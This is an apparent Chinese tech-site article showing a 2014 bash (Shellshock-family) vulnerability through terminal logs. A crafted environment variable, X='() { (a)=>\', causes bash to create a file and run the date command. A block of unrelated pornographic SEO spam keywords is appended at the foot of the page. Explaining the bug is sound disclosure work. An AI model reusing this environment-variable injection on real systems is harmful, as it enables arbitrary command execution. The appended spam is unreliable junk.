《電子技術應用》
您所在的位置:首頁 > 嵌入式技術 > 設計應用 > 一個linux下的bash安全漏洞
一個linux下的bash安全漏洞
摘要:
關鍵詞: bash 09 2014 2713 david davidcchen
Abstract:
Key words :

 1. 通過設置一個特殊的環境變量的env,能間接地查到到linux命令的屬性,如下:

  [2014-09-27 13:00:54 david@davidcchen ~]$ ls -l date

  ls: cannot access date: No such file or directory

  [2014-09-27 13:01:13 david@davidcchen ~]$ env -i X='() { (a)=>\' bash -c 'date'

  bash: X: line 1: syntax error near unexpected token `='

  bash: X: line 1: `'

  bash: error importing function definition for `X'

  [2014-09-27 13:01:21 david@davidcchen ~]$ ls -l date

  -rw-rw-r--. 1 david david 0 Sep 27 13:01 date

  [2014-09-27 13:01:27 david@davidcchen ~]$

  2. 一次運行環境變量。

  [2014-09-27 13:01:27 david@davidcchen ~]$ zsh --version

  zsh 4.3.10 (x86_64-redhat-linux-gnu)

  [2014-09-27 13:03:24 david@davidcchen ~]$ bash --version

  GNU bash, version 4.1.2(1)-release (x86_64-redhat-linux-gnu)

  Copyright (C) 2009 Free Software Foundation, Inc.

  License GPLv3+: GNU GPL version 3 or later

  This is free software; you are free to change and redistribute it.

  There is NO WARRANTY, to the extent permitted by law.

  [2014-09-27 13:03:31 david@davidcchen ~]$ env X='() { (a)=>\' bash -c "echo date"; cat echo; rm echo

  bash: X: line 1: syntax error near unexpected token `='

  bash: X: line 1: `'

  bash: error importing function definition for `X'

  Sat Sep 27 13:03:52 CST 2014

  ---------->成功運行date命令

此內容為AET網站原創,未經授權禁止轉載。
主站蜘蛛池模板: 热99re久久精品香蕉| 青草青在线视频| 天仙tv在线视频一区二区| 中文字幕精品亚洲无线码一区 | 国产日韩欧美自拍| 91蝌蚪在线视频| 天天综合天天综合| 一级看片免费视频囗交| 日本a免费观看| 久久精品国产亚洲av电影网| 欧美一级在线视频| 亚洲日本中文字幕天天更新| 特级毛片a级毛片免费播放| 全彩里番acg里番本子| 美女扒开屁股让男人桶| 国产乱子伦真实china| 黄色毛片电影黄色毛片| 国产福利你懂的| 18禁亚洲深夜福利人口| 国内大量揄拍人妻精品視頻| a毛片免费全部播放完整成| 小说区乱图片区| 两个人看的www免费高清| 无码熟熟妇丰满人妻啪啪软件| 久久国产高潮流白浆免费观看| 日韩精品无码久久一区二区三| 亚洲人成在线免费观看| 欧美成人精品a∨在线观看| 亚洲精品无码专区在线| 男女啪啪免费体验区| 免费在线视频你懂的| 精品人无码一区二区三区| 午夜电影在线看| 美女视频一区二区三区| 四虎永久成人免费影院域名 | 好朋友4韩国完整版观看| 两个人看的www免费| 成人久久久久久| 三上悠亚在线观看视频| 成人看片黄在线观看| 中国大白屁股ass|